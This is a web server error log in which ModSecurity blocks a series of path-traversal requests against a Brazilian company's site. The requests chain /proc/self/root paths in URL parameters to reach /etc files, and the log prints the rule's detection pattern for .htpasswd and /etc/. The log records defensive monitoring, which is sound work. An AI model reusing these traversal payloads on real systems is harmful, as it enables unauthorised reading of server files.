[Fri Mar 20 04:22:23.797085 2026] [:error] [pid 9818:tid 140411741927168] [client 74.7.243.128:59392] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz1r11pVZ5mVmJwsFMHTwAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:22:40.747090 2026] [:error] [pid 31215:tid 140411590858496] [client 74.7.243.128:59408] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz1wAF0L0L-SsrnPo4-xgAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:22:51.577480 2026] [:error] [pid 7893:tid 140411607643904] [client 74.7.243.128:60214] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz1yxCii7xarUs8iHY8EgAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:23:02.647043 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:50992] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz11uoXxyEfFpUF8f9aFgAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:23:05.039320 2026] [:error] [pid 10189:tid 140411632822016] [client 74.7.243.128:56462] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz12TJ3M9BSuKP7CAbnFgAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:23:08.417397 2026] [:error] [pid 10189:tid 140411708356352] [client 74.7.243.128:56476] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz13DJ3M9BSuKP7CAbnHgAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:23:11.387156 2026] [mime_magic:error] [pid 7235:tid 140411691570944] (70014)End of file found: [client 57.141.18.92:35794] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 04:23:17.252561 2026] [:error] [pid 31215:tid 140411548894976] [client 74.7.243.128:58110] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz15QF0L0L-SsrnPo4-8gAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:23:32.119671 2026] [:error] [pid 11642:tid 140411674785536] [client 74.7.243.128:58116] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz19Lninkcc-iUj5Aoz9wAAA4g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:23:43.764604 2026] [:error] [pid 9818:tid 140411649607424] [client 74.7.243.128:58614] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz1_11pVZ5mVmJwsFMHfQAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:23:53.184930 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:58184] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz2Bta6ubjKNq_cu4al8wAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:23:54.923581 2026] [:error] [pid 10189:tid 140411574073088] [client 74.7.243.128:59510] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz2CjJ3M9BSuKP7CAbnNAAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:24:34.593056 2026] [:error] [pid 31215:tid 140411699963648] [client 74.7.243.128:59524] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz2MgF0L0L-SsrnPo4_MgAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:24:51.019015 2026] [:error] [pid 11167:tid 140411557287680] [client 74.7.243.128:35414] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz2Q_HIg5MgXLBnicPSaQAAAdY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:24:52.339002 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:60518] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz2RNa6ubjKNq_cu4amMgAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:24:55.485941 2026] [mime_magic:error] [pid 11167:tid 140411616036608] (70014)End of file found: [client 74.7.241.31:34010] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/var/run
[Fri Mar 20 04:25:11.245276 2026] [:error] [pid 7235:tid 140411574073088] [client 74.7.243.128:60526] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz2V_qxLDW4GITHUkS4nAAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:25:32.312625 2026] [:error] [pid 10189:tid 140411616036608] [client 74.7.243.128:60700] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz2bDJ3M9BSuKP7CAbncQAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:25:56.620958 2026] [:error] [pid 11642:tid 140411548894976] [client 74.7.243.128:48780] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz2hLninkcc-iUj5Ao0mQAAA5c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:26:06.289652 2026] [:error] [pid 31215:tid 140411574073088] [client 74.7.243.128:54842] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz2jgF0L0L-SsrnPo4_YgAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:28:07.312907 2026] [mime_magic:error] [pid 11642:tid 140411708356352] (70014)End of file found: [client 57.141.18.95:44450] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 04:28:45.120452 2026] [:error] [pid 7235:tid 140411557287680] [client 74.7.241.31:43466] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3LfqxLDW4GITHUkS5gQAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:28:46.411525 2026] [:error] [pid 21219:tid 140411691570944] [client 74.7.241.31:53448] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libaudit.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3LvXLqtnMIWvjpaJwfAAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:28:47.698315 2026] [:error] [pid 21219:tid 140411582465792] [client 74.7.241.31:43488] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3L_XLqtnMIWvjpaJwgQAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
